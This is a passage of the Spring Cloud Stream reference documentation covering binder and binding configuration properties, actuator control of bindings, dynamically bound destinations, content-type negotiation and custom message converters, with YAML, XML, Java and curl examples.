NOTE: Turning on explicit binder configuration disables the default binder configuration process altogether.\nIf you do so, all binders in use must be included in the configuration.\nFrameworks that intend to use Spring Cloud Stream transparently may create binder configurations that can be referenced by name, but they do not affect the default binder configuration.\nIn order to do so, a binder configuration may have its `defaultCandidate` flag set to false (for example, `spring.cloud.stream.binders.<configurationName>.defaultCandidate=false`).\nThis denotes a configuration that exists independently of the default binder configuration process.\n\nThe following example shows a typical configuration for a processor application that connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n  cloud:\n    stream:\n      bindings:\n        input:\n          destination: thing1\n          binder: rabbit1\n        output:\n          destination: thing2\n          binder: rabbit2\n      binders:\n        rabbit1:\n          type: rabbit\n          environment:\n            spring:\n              rabbitmq:\n                host: <host1>\n        rabbit2:\n          type: rabbit\n          environment:\n            spring:\n              rabbitmq:\n                host: <host2>\n----\n\n=== Binding visualization and control\n\nSince version 2.0, Spring Cloud Stream supports visualization and control of the bindings through Actuator endpoints.\n\nAlso starting with version 2.0, actuator and web are optional, so you must first add one of the web dependencies as well as the actuator dependency manually.\nThe following example shows how to add the dependency for the Web framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-web<\/artifactId>\n<\/dependency>\n----\n\nThe following example shows how to add the dependency for the WebFlux framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-webflux<\/artifactId>\n<\/dependency>\n----\n\nYou can add the Actuator dependency as follows:\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n<\/dependency>\n----\n\nNOTE: To run Spring Cloud Stream 2.0 apps in Cloud Foundry, you must add `spring-boot-starter-web` and `spring-boot-starter-actuator` to the classpath. Otherwise, the\napplication will not start due to health check failures.\n\nYou must also enable the `bindings` actuator endpoints by setting the following property: `--management.endpoints.web.exposure.include=bindings`.\n\nOnce those prerequisites are satisfied, you should see the following in the logs when the application starts:\n\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[POST]. . .\n\t: Mapped \"{[\/actuator\/bindings],methods=[GET]. . .\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[GET]. . .\n\n
To visualize the current bindings, access the following URL:\n`http:\/\/<host>:<port>\/actuator\/bindings`\n\nAlternatively, to see a single binding, access one of the URLs similar to the following:\n`http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName`\n\nYou can also stop, start, pause, and resume individual bindings by posting to the same URL while providing a `state` argument as JSON, as shown in the following examples:\n\n[source,text]\n----\ncurl -d '{\"state\":\"STOPPED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"STARTED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"PAUSED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"RESUMED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\n----\n\nNOTE: `PAUSED` and `RESUMED` work only when the corresponding binder and its underlying technology support it. Otherwise, you see a warning message in the logs.\nCurrently, only the Kafka binder supports the `PAUSED` and `RESUMED` states.\n\n=== Binder Configuration Properties\n\nThe following properties are available when customizing binder configurations. These properties are exposed via `org.springframework.cloud.stream.config.BinderProperties`\nand must be prefixed with `spring.cloud.stream.binders.<configurationName>`.\n\ntype::\nThe binder type.\nIt typically references one of the binders found on the classpath -- in particular, a key in a `META-INF\/spring.binders` file.\n+\nBy default, it has the same value as the configuration name.\ninheritEnvironment::\nWhether the configuration inherits the environment of the application itself.\n+\nDefault: `true`.\nenvironment::\nRoot for a set of properties that can be used to customize the environment of the binder.\nWhen this property is set, the context in which the binder is being created is not a child of the application context.\nThis setting allows for complete separation between the binder components and the application components.\n+\nDefault: `empty`.\ndefaultCandidate::\nWhether the binder configuration is a candidate for being considered a default binder or can be used only when explicitly referenced.\nThis setting allows adding binder configurations without interfering with the default processing.\n+\nDefault: `true`.\n\n
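Putting these properties together, the following sketch declares a named binder configuration that is excluded from default-binder selection (the configuration name `auditRabbit` and the host value are assumptions for illustration):\n\n[source,yml]\n----\nspring:\n  cloud:\n    stream:\n      binders:\n        auditRabbit:             # referenced from a binding as 'binder: auditRabbit'\n          type: rabbit\n          inheritEnvironment: false\n          defaultCandidate: false\n          environment:\n            spring:\n              rabbitmq:\n                host: <audit-host>\n----\n\n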
== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders let additional binding properties support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications through any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Binding Service Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingServiceProperties`.\n\nspring.cloud.stream.instanceCount::\nThe number of deployed instances of an application.\nMust be set for partitioning on the producer side. Must be set on the consumer side when using RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\nThe instance index of the application: A number from `0` to `instanceCount - 1`.\nUsed for partitioning with RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\nAutomatically set in Cloud Foundry to match the application's instance index.\n\nspring.cloud.stream.dynamicDestinations::\nA list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (letting any destination be bound).\n\nspring.cloud.stream.defaultBinder::\nThe default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n+\nDefault: empty.\n\nspring.cloud.stream.overrideCloudConnectors::\nThis property is only applicable when the `cloud` profile is active and Spring Cloud Connectors are provided with the application.\nIf the property is `false` (the default), the binder detects a suitable bound service (for example, a RabbitMQ service bound in Cloud Foundry for the RabbitMQ binder) and uses it for creating connections (usually through Spring Cloud Connectors).\nWhen set to `true`, this property instructs binders to completely ignore the bound services and rely on Spring Boot properties (for example, relying on the `spring.rabbitmq.*` properties provided in the environment for the RabbitMQ binder).\nThe typical usage of this property is to be nested in a customized environment <<multiple-systems, when connecting to multiple systems>>.\n+\nDefault: `false`.\n\nspring.cloud.stream.bindingRetryInterval::\nThe interval (in seconds) between retrying binding creation when, for example, the binder does not support late binding and the broker (for example, Apache Kafka) is down.\nSet it to zero to treat such conditions as fatal, preventing the application from starting.\n+\nDefault: `30`.\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied by using the format of `spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (for example, `output` for a `Source`).\n\nTo avoid repetition, Spring Cloud Stream supports setting values for all channels, in the format of `spring.cloud.stream.default.<property>=<value>`.\n\nWhen it comes to avoiding repetition for extended binding properties, use the following format: `spring.cloud.stream.<binder-type>.default.<producer|consumer>.<property>=<value>`.\n\nIn what follows, we indicate where we have omitted the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix is included at runtime.\n\n
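As a minimal sketch of these default formats (the property values are assumptions for illustration):\n\n[source,text]\n----\n# applies to all bindings that do not override it\nspring.cloud.stream.default.contentType=application\/json\n\n# applies to all Rabbit consumer bindings (extended binding property default)\nspring.cloud.stream.rabbit.default.consumer.auto-bind-dlq=true\n----\n\n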
==== Common Binding Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingProperties`.\n\nThe following binding properties are available for both input and output bindings and must be prefixed with `spring.cloud.stream.bindings.<channelName>.` (for example, `spring.cloud.stream.bindings.input.destination=ticktock`).\n\nDefault values can be set by using the `spring.cloud.stream.default` prefix (for example, `spring.cloud.stream.default.contentType=application\/json`).\n\ndestination::\nThe target destination of a channel on the bound middleware (for example, the RabbitMQ exchange or Kafka topic).\nIf the channel is bound as a consumer, it could be bound to multiple destinations, and the destination names can be specified as comma-separated `String` values.\nIf not set, the channel name is used instead.\nThe default value of this property cannot be overridden.\ngroup::\nThe consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: `null` (indicating an anonymous consumer).\ncontentType::\nThe content type of the channel.\nSee \"`<<content-type-management>>`\".\n+\nDefault: `application\/json`.\nbinder::\nThe binder used by this binding.\nSee \"`<<multiple-binders>>`\" for details.\n+\nDefault: `null` (the default binder is used, if it exists).\n\n==== Consumer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ConsumerProperties`.\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.` (for example, `spring.cloud.stream.bindings.input.consumer.concurrency=3`).\n\nDefault values can be set by using the `spring.cloud.stream.default.consumer` prefix (for example, `spring.cloud.stream.default.consumer.headerMode=none`).\n\nconcurrency::\nThe concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\nWhether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\nWhen set to `none`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when consuming data from non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: depends on the binder implementation.\nmaxAttempts::\nIf processing fails, the number of attempts to process the message (including the first).\nSet to `1` to disable retry.\n+\nDefault: `3`.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault: `1000`.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault: `10000`.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault: `2.0`.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\ninstanceIndex::\nWhen set to a value greater than or equal to zero, it allows customizing the instance index of this consumer (if different from `spring.cloud.stream.instanceIndex`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceIndex`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\ninstanceCount::\nWhen set to a value greater than or equal to zero, it allows customizing the instance count of this consumer (if different from `spring.cloud.stream.instanceCount`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceCount`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\nretryableExceptions::\nA map of Throwable class names in the key and a boolean in the value.\nSpecify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetryable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\nuseNativeDecoding::\nWhen set to `true`, the inbound message is deserialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka consumer value deserializer).\nWhen this configuration is being used, the inbound message unmarshalling is not based on the `contentType` of the binding.\nWhen native decoding is used, it is the responsibility of the producer to use an appropriate encoder (for example, the Kafka producer value serializer) to serialize the outbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the producer property `useNativeEncoding`.\n+\nDefault: `false`.\n\n
deserialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka consumer value deserializer).\nWhen this configuration is being used, the inbound message unmarshalling is not based on the `contentType` of the binding.\nWhen native decoding is used, it is the responsibility of the producer to use an appropriate encoder (for example, the Kafka producer value serializer) to serialize the outbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the producer property `useNativeEncoding`.\n+\nDefault: `false`.\n\n\n==== Producer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ProducerProperties`.\n\nThe following binding properties are available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.` (for example, `spring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id`).\n\nDefault values can be set by using the prefix `spring.cloud.stream.default.producer` (for example, `spring.cloud.stream.default.producer.partitionKeyExpression=payload.id`).\n\npartitionKeyExpression::\nA SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExtractorClass`.\nSee \"`<<partitioning>>`\".\n+\nDefault: `null`.\npartitionKeyExtractorClass::\nA `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExpression`.\nSee \"`<<partitioning>>`\".\n+\nDefault: `null`.\npartitionSelectorClass::\nA `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionSelectorExpression::\nA SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionCount::\nThe number of target partitions for the data, if partitioning is enabled.\nMust be set to a value greater than 1 if the producer is partitioned.\nOn Kafka, it is interpreted as a hint. 
The larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\nA comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (for example, by pre-creating durable queues in RabbitMQ).\nheaderMode::\nWhen set to `none`, it disables header embedding on output.\nIt is effective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when producing data for non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: depends on the binder implementation.\nuseNativeEncoding::\nWhen set to `true`, the outbound message is serialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka producer value serializer).\nWhen this configuration is being used, the outbound message marshalling is not based on the `contentType` of the binding.\nWhen native encoding is used, it is the responsibility of the consumer to use an appropriate decoder (for example, the Kafka consumer value deserializer) to deserialize the inbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the consumer property `useNativeDecoding`.\n+\nDefault: `false`.\nerrorChannelEnabled::\nWhen set to `true`, if the binder supports asynchronous send results, send failures are sent to an error channel for the destination.\nSee \"`<<binder-error-channels>>`\" for more information.\n+\nDefault: `false`.\n\n[[dynamicdestination]]\n=== Using Dynamically Bound Destinations\n\nBesides the channels defined by using `@EnableBinding`, Spring Cloud Stream lets applications send messages to dynamically bound destinations.\nThis is useful, for example, when the target destination needs to be determined at runtime.\nApplications can do so by using the `BinderAwareChannelResolver` bean, registered automatically by the `@EnableBinding` annotation.\n\nThe `spring.cloud.stream.dynamicDestinations` property can be used for restricting the dynamic destination names to a known set (whitelisting).\nIf this property is not set, any destination can be bound dynamically.\n\nThe `BinderAwareChannelResolver` can be used directly, as shown in the following example of a REST controller using a path variable to decide the target channel:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n @RequestMapping(path = \"\/{target}\", method = POST, consumes = \"*\/*\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @PathVariable(\"target\") String target,\n @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, target, contentType);\n }\n\n private void sendMessage(String body, String target, Object contentType) {\n resolver.resolveDestination(target).send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n}\n----\n\nNow consider what happens when we start the application on the default port (8080) and make the following requests with curl:\n\n----\ncurl -H \"Content-Type: 
application\/json\" -X POST -d \"customer-1\" http:\/\/localhost:8080\/customers\n\ncurl -H \"Content-Type: application\/json\" -X POST -d \"order-1\" http:\/\/localhost:8080\/orders\n----\n\nThe destinations, 'customers' and 'orders', are created in the broker (in the exchange for Rabbit or in the topic for Kafka) with names of 'customers' and 'orders', and the data is published to the appropriate destinations.\n\nThe `BinderAwareChannelResolver` is a general-purpose Spring Integration `DestinationResolver` and can be injected in other components -- for example, in a router using a SpEL expression based on the `target` field of an incoming JSON message. The following example includes a router that reads SpEL expressions:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n\n @RequestMapping(path = \"\/\", method = POST, consumes = \"application\/json\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, contentType);\n }\n\n private void sendMessage(Object body, Object contentType) {\n routerChannel().send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n\n @Bean(name = \"routerChannel\")\n public MessageChannel routerChannel() {\n return new DirectChannel();\n }\n\n @Bean\n @ServiceActivator(inputChannel = \"routerChannel\")\n public ExpressionEvaluatingRouter router() {\n ExpressionEvaluatingRouter router =\n new ExpressionEvaluatingRouter(new SpelExpressionParser().parseExpression(\"payload.target\"));\n router.setDefaultOutputChannelName(\"default-output\");\n router.setChannelResolver(resolver);\n return router;\n }\n}\n----\n\nThe https:\/\/github.com\/spring-cloud-stream-app-starters\/router[Router Sink Application] uses this technique to create the destinations on-demand.\n\nIf the channel names are known in advance, you can configure the producer properties as with any other destination.\nAlternatively, if you register a `NewDestinationBindingCallback<>` bean, it is invoked just before the binding is created.\nThe callback takes the generic type of the extended producer properties used by the binder.\nIt has one method:\n\n[source, java]\n----\nvoid configure(String channelName, MessageChannel channel, ProducerProperties producerProperties,\n T extendedProducerProperties);\n----\n\nThe following example shows how to use the RabbitMQ binder:\n\n[source, java]\n----\n@Bean\npublic NewDestinationBindingCallback<RabbitProducerProperties> dynamicConfigurer() {\n return (name, channel, props, extended) -> {\n props.setRequiredGroups(\"bindThisQueue\");\n extended.setQueueNameGroupOnly(true);\n extended.setAutoBindDlq(true);\n extended.setDeadLetterQueueName(\"myDLQ\");\n };\n}\n----\n\nNOTE: If you need to support dynamic destinations with multiple binder types, use `Object` for the generic type and cast the `extended` argument as needed.\n\n[[content-type-management]]\n== Content Type Negotiation\n\nData transformation is one of the core features of any message-driven microservice architecture. Given that, in Spring Cloud Stream, such data\nis represented as a Spring `Message`, a message may have to be transformed to a desired shape or size before reaching its destination. This is required for two reasons:\n\n. 
To convert the contents of the incoming message to match the signature of the application-provided handler.\n\n. To convert the contents of the outgoing message to the wire format.\n\nThe wire format is typically `byte[]` (that is true for the Kafka and Rabbit binders), but it is governed by the binder implementation.\n\nIn Spring Cloud Stream, message transformation is accomplished with an `org.springframework.messaging.converter.MessageConverter`.\n\nNOTE: As a supplement to the details to follow, you may also want to read the following https:\/\/spring.io\/blog\/2018\/02\/26\/spring-cloud-stream-2-0-content-type-negotiation-and-transformation[blog post].\n\n=== Mechanics\n\nTo better understand the mechanics and the necessity behind content-type negotiation, we take a look at a very simple use case by using the following message handler as an example:\n\n[source, java]\n----\n@StreamListener(Processor.INPUT)\n@SendTo(Processor.OUTPUT)\npublic String handle(Person person) {..}\n----\n\nNOTE: For simplicity, we assume that this is the only handler in the application (we assume there is no internal pipeline).\n\nThe handler shown in the preceding example expects a `Person` object as an argument and produces a `String` type as an output.\nIn order for the framework to succeed in passing the incoming `Message` as an argument to this handler, it has to somehow transform the payload of the `Message` from the wire format to a `Person` type.\nIn other words, the framework must locate and apply the appropriate `MessageConverter`.\nTo accomplish that, the framework needs some instructions from the user.\nOne of these instructions is already provided by the signature of the handler method itself (`Person` type).\nConsequently, in theory, that should be (and, in some cases, is) enough.\nHowever, for the majority of use cases, in order to select the appropriate `MessageConverter`, the framework needs an additional piece of information.\nThat missing piece is `contentType`.\n\nSpring Cloud Stream provides three mechanisms to define `contentType` (in order of precedence):\n\n. *HEADER*: The `contentType` can be communicated through the Message itself. By providing a `contentType` header, you declare the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *BINDING*: The `contentType` can be set per destination binding by setting the `spring.cloud.stream.bindings.input.content-type` property.\n+\nNOTE: The `input` segment in the property name corresponds to the actual name of the destination (which is \u201cinput\u201d in our case). This approach lets you declare, on a per-binding basis, the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *DEFAULT*: If `contentType` is not present in the `Message` header or the binding, the default `application\/json` content type is used to\nlocate and apply the appropriate `MessageConverter`.\n\nAs mentioned earlier, the preceding list also demonstrates the order of precedence in case of a tie. 
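\n\nAs a quick illustration of the first mechanism, the following minimal sketch (the class name and payload are illustrative, not from this documentation) constructs a `Message` that carries its own `contentType` header:\n\n[source,java]\n----\nimport org.springframework.messaging.Message;\nimport org.springframework.messaging.MessageHeaders;\nimport org.springframework.messaging.support.MessageBuilder;\nimport org.springframework.util.MimeTypeUtils;\n\npublic class ContentTypeHeaderExample {\n\n \/\/ A header-provided contentType (mechanism 1) overrides the per-binding\n \/\/ property (mechanism 2) and the application\/json default (mechanism 3).\n public Message<String> textMessage() {\n return MessageBuilder\n .withPayload(\"hello\")\n .setHeader(MessageHeaders.CONTENT_TYPE, MimeTypeUtils.TEXT_PLAIN)\n .build();\n }\n}\n----\n\n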
For example, a header-provided content type takes precedence over any other content type.\nThe same applies for a content type set on a per-binding basis, which essentially lets you override the default content type.\nHowever, it also provides a sensible default (which was determined from community feedback).\n\nAnother reason for making `application\/json` the default stems from the interoperability requirements driven by distributed microservices architectures, where producer and consumer not only run in different JVMs but can also run on different non-JVM platforms.\n\nWhen the non-void handler method returns, if the return value is already a `Message`, that `Message` becomes the payload. However, when the return value is not a `Message`, the new `Message` is constructed with the return value as the payload while inheriting\nheaders from the input `Message` minus the headers defined or filtered by `SpringIntegrationProperties.messageHandlerNotPropagatedHeaders`.\nBy default, there is only one header set there: `contentType`. This means that the new `Message` does not have the `contentType` header set, thus ensuring that the `contentType` can evolve.\nYou can always opt out by returning a `Message` from the handler method, where you can inject any header you wish.\n\nIf there is an internal pipeline, the `Message` is sent to the next handler by going through the same process of conversion. However, if there is no internal pipeline or you have reached the end of it, the `Message` is sent back to the output destination.\n\n==== Content Type versus Argument Type\n\nAs mentioned earlier, for the framework to select the appropriate `MessageConverter`, it requires argument type and, optionally, content type information.\nThe logic for selecting the appropriate `MessageConverter` resides with the argument resolvers (`HandlerMethodArgumentResolvers`), which trigger right before the invocation of the user-defined handler method (which is when the actual argument type is known to the framework).\nIf the argument type does not match the type of the current payload, the framework delegates to the stack of the\npre-configured `MessageConverters` to see if any one of them can convert the payload.\nAs you can see, the `Object fromMessage(Message<?> message, Class<?> targetClass);`\noperation of the `MessageConverter` takes `targetClass` as one of its arguments.\nThe framework also ensures that the provided `Message` always contains a `contentType` header.\nWhen no `contentType` header is already present, it injects either the per-binding `contentType` header or the default `contentType` header.\nThe combination of `contentType` and argument type is the mechanism by which the framework determines whether a message can be converted to a target type.\nIf no appropriate `MessageConverter` is found, an exception is thrown, which you can handle by adding a custom `MessageConverter` (see \"`<<spring-cloud-stream-overview-user-defined-message-converters>>`\").\n\nBut what if the payload type matches the target type declared by the handler method? In this case, there is nothing to convert, and the payload is passed unmodified.\n\n
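For instance, since the wire format for the Kafka and Rabbit binders is `byte[]`, a handler that itself declares `byte[]` receives the raw payload with no converter involved. The following sketch (a hypothetical handler, not from this documentation) shows such a pass-through:\n\n[source,java]\n----\n\/\/ The payload already matches the declared argument type (byte[] is the wire\n\/\/ format), so no MessageConverter is invoked on input.\n@StreamListener(Processor.INPUT)\n@SendTo(Processor.OUTPUT)\npublic byte[] echoRaw(byte[] payload) {\n return payload;\n}\n----\n\n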
While this sounds pretty straightforward and logical, keep in mind handler methods that take a `Message<?>` or `Object` as an argument.\nBy declaring the target type to be `Object` (which is an `instanceof` everything in Java), you essentially forfeit the conversion process.\n\nNOTE: Do not expect `Message` to be converted into some other type based only on the `contentType`.\nRemember that the `contentType` is complementary to the target type.\nIf you wish, you can provide a hint, which `MessageConverter` may or may not take into consideration.\n\n==== Message Converters\n\n`MessageConverters` define two methods:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<?> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\nIt is important to understand the contract of these methods and their usage, specifically in the context of Spring Cloud Stream.\n\nThe `fromMessage` method converts an incoming `Message` to an argument type.\nThe payload of the `Message` could be any type, and it is\nup to the actual implementation of the `MessageConverter` to support multiple types.\nFor example, a JSON converter may support the payload type as `byte[]`, `String`, and others.\nThis is important when the application contains an internal pipeline (that is, input -> handler1 -> handler2 -> ... -> output) and the output of the upstream handler results in a `Message` which may not be in the initial wire format.\n\nHowever, the `toMessage` method has a more strict contract and must always convert `Message` to the wire format: `byte[]`.\n\nSo, for all intents and purposes (and especially when implementing your own converter), you can regard the two methods as having the following signatures:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<byte[]> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\n=== Provided MessageConverters\n\nAs mentioned earlier, the framework already provides a stack of `MessageConverters` to handle most common use cases.\nThe following list describes the provided `MessageConverters`, in order of precedence (the first `MessageConverter` that works is used):\n\n. `ApplicationJsonMessageMarshallingConverter`: Variation of the `org.springframework.messaging.converter.MappingJackson2MessageConverter`. Supports conversion of the payload of the `Message` to\/from POJO for cases when `contentType` is `application\/json` (DEFAULT).\n. `TupleJsonMessageConverter`: *DEPRECATED* Supports conversion of the payload of the `Message` to\/from `org.springframework.tuple.Tuple`.\n. `ByteArrayMessageConverter`: Supports conversion of the payload of the `Message` from `byte[]` to `byte[]` for cases when `contentType` is `application\/octet-stream`. It is essentially a pass-through and exists primarily for backward compatibility.\n. `ObjectStringMessageConverter`: Supports conversion of any type to a `String` when `contentType` is `text\/plain`.\nIt invokes Object's `toString()` method or, if the payload is `byte[]`, a new `String(byte[])`.\n. `JavaSerializationMessageConverter`: *DEPRECATED* Supports conversion based on Java serialization when `contentType` is `application\/x-java-serialized-object`.\n. `KryoMessageConverter`: *DEPRECATED* Supports conversion based on Kryo serialization when `contentType` is `application\/x-java-object`.\n. `JsonUnmarshallingConverter`: Similar to the `ApplicationJsonMessageMarshallingConverter`. 
It supports conversion of any type when `contentType` is `application\/x-java-object`.\nIt expects the actual type information to be embedded in the `contentType` as an attribute (for example, `application\/x-java-object;type=foo.bar.Cat`).\n\nWhen no appropriate converter is found, the framework throws an exception. When that happens, you should check your code and configuration and ensure you did not miss anything (that is, ensure that you provided a `contentType` by using a binding or a header).\nHowever, most likely, you found some uncommon case (such as a custom `contentType`) and the current stack of provided `MessageConverters`\ndoes not know how to convert. If that is the case, you can add a custom `MessageConverter`. See <<spring-cloud-stream-overview-user-defined-message-converters>>.\n\n[[spring-cloud-stream-overview-user-defined-message-converters]]\n=== User-defined Message Converters\n\nSpring Cloud Stream exposes a mechanism to define and register additional `MessageConverters`.\nTo use it, implement `org.springframework.messaging.converter.MessageConverter`, configure it as a `@Bean`, and annotate it with `@StreamMessageConverter`.\nIt is then added to the existing stack of `MessageConverter`s.\n\nNOTE: It is important to understand that custom `MessageConverter` implementations are added to the head of the existing stack.\nConsequently, custom `MessageConverter` implementations take precedence over the existing ones, which lets you override as well as add to the existing converters.\n\nThe following example shows how to create a message converter bean to support a new content type called `application\/bar`:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n @StreamMessageConverter\n public MessageConverter customMessageConverter() {\n return new MyCustomMessageConverter();\n }\n}\n\npublic class MyCustomMessageConverter extends AbstractMessageConverter {\n\n public MyCustomMessageConverter() {\n super(new MimeType(\"application\", \"bar\"));\n }\n\n @Override\n protected boolean supports(Class<?> clazz) {\n return (Bar.class.equals(clazz));\n }\n\n @Override\n protected Object convertFromInternal(Message<?> message, Class<?> targetClass, Object conversionHint) {\n Object payload = message.getPayload();\n return (payload instanceof Bar ? 
payload : new Bar((byte[]) payload));\n }\n}\n----\n\nSpring Cloud Stream also provides support for Avro-based converters and schema evolution.\nSee \"`<<schema-evolution>>`\" for details.\n\n[[schema-evolution]]\n== Schema Evolution Support\n\nSpring Cloud Stream provides support for schema evolution, so that data can evolve over time and still work with both older and newer producers and consumers.\nMost serialization models, especially the ones that aim for portability across different platforms and languages, rely on a schema that describes how the data is serialized in the binary payload.\nIn order to serialize the data and then to interpret it, both the sending and receiving sides must have access to a schema that describes the binary format.\nIn certain cases, the schema can be inferred from the payload type on serialization or from the target type on deserialization.\nHowever, many applications benefit from having access to an explicit schema that describes the binary data format.\nA schema registry lets you store schema information in a textual format (typically JSON) and makes that information accessible to various applications that need it to receive and send data in binary format.\nA schema is referenceable as a tuple consisting of:\n\n* A subject that is the logical name of the schema\n* The schema version\n* The schema format, which describes the binary format of the data\n\nThe following sections go through the details of the various components involved in the schema evolution process.\n\n=== Schema Registry Client\n\nThe client-side abstraction for interacting with schema registry servers is the `SchemaRegistryClient` interface, which has the following structure:\n\n[source,java]\n----\npublic interface SchemaRegistryClient {\n\n SchemaRegistrationResponse register(String subject, String format, String schema);\n\n String fetch(SchemaReference schemaReference);\n\n String fetch(Integer id);\n\n}\n----\n\nSpring Cloud Stream provides out-of-the-box implementations for interacting with its own schema server and for interacting with the Confluent Schema Registry.\n\nA client for 